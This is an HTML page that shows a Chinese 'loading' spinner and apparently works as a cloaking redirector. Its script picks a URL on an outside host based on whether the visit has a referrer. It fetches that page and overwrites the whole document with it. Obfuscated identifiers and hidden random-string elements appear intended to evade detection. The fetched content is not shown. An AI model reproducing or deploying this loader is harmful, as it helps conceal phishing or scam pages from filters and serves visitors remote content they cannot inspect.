<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MLBgI7sKp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MLBgI7sKp .On7sRtYkm {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MLBgI7sKp .content {
            line-height: 50px;
            text-align: center
        }

        .MLBgI7sKp .img {
            width: 100%
        }

        .MLBgI7sKp .EcVYBsL8 {
            text-align: center
        }

        .MLBgI7sKp .EcVYBsL8 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MLBgI7sKp .EcVYBsL8 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MLBgI7sKp .EcVYBsL8 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MLBgI7sKp .EcVYBsL8 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MLBgI7sKp .EcVYBsL8 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MLBgI7sKp .EcVYBsL8 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MLBgI7sKp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NQe4SkOIk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Q9AFM9 = NQe4SkOIk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Q9AFM9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Q9AFM9 +".html?a=share";
		}
		
        BfojqUC1=url+"#"+new Date().getTime();
        BfojqUC1 && function() {
            $.get(BfojqUC1, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >kIdCxonvlyOmfzbxM9VYC3P8NTcMzNw3w037o7NUQEEsqa</li>
<b style='display:none' >x7mv3Jw2MtDxaoKvrTHZG431acXjKra2WKL9ByatqUij4p</b>
<ul style='display:none' >L5WRiXpmyar4dQEYayZqbGZRRO0rHwLgB2tRuf9mhqxhyuCpS4U4pCm5</ul>
<img  src='' style='display:none'>
<p  style='display:none'>jxtcetIZ2i5OCMMZiagzo0H17PBySCIt2HYA</p><div class="MLBgI7sKp">
    <div class="On7sRtYkm">
        <div class="EcVYBsL8">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >IQbwxd1CXzmadzgLobanZu5fu33EMRVK0r</b>
<img  src='' style='display:none'>
<b style='display:none' >IQbwxd1CXzmadzgLobanZu5fu33EMRVK0r</b>
<ul style='display:none' >DauV7flKXXi36404WS3Dllo9i4NGhc9RVQT9c95ov4quw6EvMmETBZV</ul></body>
</html>